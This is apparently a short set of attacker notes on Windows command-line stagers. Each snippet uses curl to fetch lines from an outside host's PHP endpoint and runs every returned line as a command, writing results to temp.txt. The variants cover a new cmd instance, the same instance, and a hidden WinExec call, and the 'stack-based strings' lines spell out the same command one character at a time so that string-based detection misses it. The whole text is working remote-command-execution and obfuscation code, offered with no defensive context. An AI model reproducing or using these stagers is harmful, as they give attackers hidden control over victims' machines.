running cmd in a new instance
for /f "delims=" %i in ('curl http://r.significantbyte.com/neweecho.php') do set output=%i && cmd.exe /c %i > temp.txt

running cmd in same instance
for /f "delims=" %i in ('curl http://r.significantbyte.com/neweecho.php') do set output=%i && %i > temp.txt

stack-based strings
'c','m','d','.','e','x','e',' ','/','c',' ','"','f','o','r',' ','/','f',' ','"','d','e','l','i','m','s','=','\"',' ','%','i',' ','i','n',' ','(','\'','c','u','r','l',' ','h','t','t','p',':','/','/','r','.','s','i','g','n','i','f','i','c','a','n','t','b','y','t','e','.','c','o','m','/','n','e','w','e','e','c','h','o','.','p','h','p','\'',')',' ','d','o',' ','s','e','t',' ','o','u','t','p','u','t','=','%','i',' ','&','&',' ','%','i',' ','>',' ','t','e','m','p','.','t','x','t','"',' ','"'
'c','m','d','.','e','x','e',' ','/','c',' ','"','f','o','r',' ','/','f',' ','"','d','e','l','i','m','s','=','"',' ','%','i',' ','i','n',' ','(','\'','c','u','r','l',' ','h','t','t','p',':','/','/','r','.','s','i','g','n','i','f','i','c','a','n','t','b','y','t','e','.','c','o','m','/','n','e','w','e','e','c','h','o','.','p','h','p','\'',')',' ','d','o',' ','s','e','t',' ','o','u','t','p','u','t','=','%','i',' ','&','&',' ','%','i','"'

winexec cmd
WinExec("cmd.exe /c \"for /f \"delims=\" %i in ('curl http://r.significantbyte.com/neweecho.php') do set output=%i && %i > temp.txt\" ", 0);